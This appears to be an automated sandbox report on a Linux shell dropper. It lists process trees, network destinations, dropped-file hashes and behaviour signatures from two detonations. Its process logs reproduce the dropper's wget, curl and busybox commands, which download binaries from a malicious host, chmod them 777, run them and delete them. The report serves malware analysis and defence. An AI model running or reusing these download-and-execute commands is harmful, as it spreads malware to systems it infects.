[/bin/busybox wget http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/chmod

[chmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly

[./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/rm

[rm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/chmod

[chmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98

[./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/rm

[rm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
DE 87.120.84.230:80 conn.masjesu.zip tcp

Files

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX

MD5 e1732e70f015e99d14dff1eeeaec9966
SHA1 c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA256 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA512 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5

MD5 546071c6a6aeff34580b4d1a9b35a7c3
SHA1 dc2de298837a86d3bc86e8a328411229d9eccdb6
SHA256 2d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12
SHA512 207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-28 02:20

Reported

2024-10-28 02:23

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

148s

Max time network

128s

Command Line

[/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh

[/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
N/A 224.0.0.251:5353 udp
US 151.101.1.91:443 tcp
GB 89.187.167.7:443 tcp
GB 185.125.188.61:443 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-28 02:20

Reported

2024-10-28 02:23

Platform

debian9-armhf-20240611-en

Max time kernel

149s

Max time network

3s

Command Line

[/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh

[/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp

Files

N/A